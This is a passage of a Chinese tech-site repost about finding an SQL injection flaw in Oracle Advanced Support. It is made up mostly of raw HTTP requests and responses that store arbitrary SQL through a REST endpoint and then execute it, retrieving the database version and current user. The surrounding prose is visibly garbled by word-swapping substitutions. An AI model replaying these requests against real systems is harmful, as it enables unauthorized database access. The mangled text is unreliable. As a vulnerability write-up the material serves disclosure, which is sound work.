我们仍然大年夜办事器获得了一个缺点返回,然则只返回了content-type。SQL语句可能已经被创建了。经由过程把名称字段设为“test”, 让我们测验测验第一个具有参数的GET请求。
我们获得一个关于SQL_NAME列的缺点,当我们在包体中包含空的json对象时这不是很不测。如今我们在包体里参加一个随机的属性名和数值。
- HTTP Request:
- GET /rest/data/sql/test HTTP/1.1
- Host: host
- Connection: close
- Accept: application/json;charset=UTF-8
- Accept-Encoding: gzip, deflate, sdch
- Accept-Language: en-US,en;q=0.8
- Content-Type: application/json;charset=UTF-8
- Content-Length: 0
- HTTP Response:
- HTTP/1.1 200 OK
- Content-Type: application/json; charset=UTF-8
- Content-Length: 24
- Connection: close
- [{"@@version":"5.5.37"}]
看这里!我们获得了一些SQL履行。
看一下“我们”是谁。
- HTTP Request:
- POST /rest/data/sql HTTP/1.1
- Host: host
- Connection: close
- Accept: */*
- Accept-Encoding: gzip, deflate, sdch
- Accept-Language: en-US,en;q=0.8
- Content-Length: 101
- Content-Type: application/json;charset=UTF-8
- {
- "name": "test2",
- "sql":"SELECT USER from dual;",
- "dataSourceJNDI":"jdbc/portal"
- }
- HTTP Request:
- GET /rest/data/sql/test2 HTTP/1.1
- Host: host
- Connection: close
- Accept: application/json;charset=UTF-8
- Accept-Encoding: gzip, deflate, sdch
- Accept-Language: en-US,en;q=0.8
- Content-Type: application/json;charset=UTF-8
- Content-Length: 0
- HTTP Response:
- HTTP/1.1 200 OK
- Content-Type: application/json; charset=UTF-8
- Content-Length: 19
- Connection: close
推荐阅读
跟着科技的进步,大年夜数据大年夜科学前沿逐渐深刻到各行业。2017年中国的大年夜数据行业有什么新动态?大年夜数据行颐魅整体市场范围若何?大年夜数据行业前景若何?若何助力企业成长?今日的比格数据,我们来一路解读>>>详细阅读
本文标题:Oracle Advanced Support系统SQL注入漏洞挖掘经验分享
地址:http://www.17bianji.com/lsqh/37236.html
1/2 1

网友点评
精彩导读
科技快报
品牌展示